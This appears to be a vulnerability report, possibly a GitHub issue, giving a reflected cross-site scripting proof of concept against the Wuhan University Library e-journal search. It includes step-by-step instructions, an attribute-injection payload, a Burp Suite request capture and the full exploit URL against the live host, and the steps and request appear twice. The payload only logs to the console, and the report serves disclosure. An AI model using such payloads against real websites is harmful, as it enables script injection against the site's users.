1 we can search Wuhan University Library on Google and click 2 then we click the E-journals of Resources 3 we click the search,then we can jump to new page 4 enter payload in the search box : 12345" onmousemove="console.log(123)
click the search box,then move the mouse over the search box,we can see log in the console 5 there is the data package of burpsuite
GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1
Host: sfx.lib.whu.edu.cn
User-Agent: R0VrgaJmaBRV
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
1 we can search Wuhan University Library on Google and click





2 then we click the E-journals of Resources
3 we click the search,then we can jump to new page
4 enter payload in the search box : 12345" onmousemove="console.log(123)
click the search box,then move the mouse over the search box,we can see log in the console
5 there is the data package of burpsuite
GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1
Host: sfx.lib.whu.edu.cn
User-Agent: R0VrgaJmaBRV
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Full URL of this vulnerability is :
http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0
The text was updated successfully, but these errors were encountered: